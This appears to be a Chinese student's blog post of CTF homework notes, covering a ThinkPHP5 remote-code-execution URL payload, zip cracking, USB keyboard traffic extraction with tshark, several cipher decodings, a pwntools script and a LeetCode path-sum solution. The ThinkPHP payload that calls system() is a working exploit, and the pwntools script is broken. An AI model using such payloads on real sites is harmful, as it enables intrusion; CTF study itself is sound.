1.22作业

发布于:2025-02-22 ⋅ 阅读:(24) ⋅ 点赞:(0)

1

 php_rce

ThinkPHP5框架

 /?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞

知道某个网页使用的框架版本,百度,利用漏洞获得想要的信息

2

 1b4b0e842bc144f1b9b75d7dd0dbc0ab.png

破解zip

提示,都要是数字,long是指什么:

是long类型进行bytes_to_long操作(F)

直接的26字母表:A-1 B-2...

图片foremost,图片找密码

(以后怎么能够从第一步就找到所有hid)

改高操作

流量分析

全是USB协议

USB键盘流量数据分析与键盘按键值解码-CSDN博客

USB(键盘)流量分析_usb流量分析-CSDN博客

【流量分析】USB键盘与鼠标流量分析_ctf usb流量分析-CSDN博客

kali下提取len=35指令:

tshark -r mysterious.pcapng -T fields -e usb.capdata -Y frame.len==35 >1.txt

 base解码

前半段是base64,后半段不是

想办法分开,尝试先把==结尾的base64分开,

再对后半部分尝试解码,确实都不是base64,没有等号有小写,尝试base58解码

emoji解密

base解码

还是没有=,有小写,但有I字母,不满足base58,base64解码

仿射密码

6 9 12...

仿射密码详解-CSDN博客

3vigenère Cipher

猜密钥就是"KEY"

加密的Vigenère密码,在线解密

4

from pwn import *
#p=process("./babyre2")
#p=remote("127.0.0.1",1339)

p=recvuntil("Please input the account:")
p.send("aaaaaaaa")
p.recvuntil("password:")
p.send("11111111")
payload="ad"*0x30
p.recvuntil("data:")
p.send(payload)
p.interactive

5

class Solution {
public:
    int minPathSum(vector<vector<int> >& matrix) {
        int row = matrix.size(), col = matrix[0].size(); 
        for (int i = 0; i < row; i ++) {
            for (int j = 0; j < col; j ++) {
                if (i == 0 && j != 0) { // 数组第一行
                    matrix[0][j] += matrix[0][j - 1];
                } else if (j == 0 && i != 0) { // 数组第一列
                    matrix[i][0] += matrix[i - 1][0]; 
                } else if (i > 0 && j > 0) {
                    // 取最小
                    matrix[i][j] += min(matrix[i - 1][j], matrix[i][j - 1]);
                }
            }
        }
        return matrix[row - 1][col - 1];
    }
};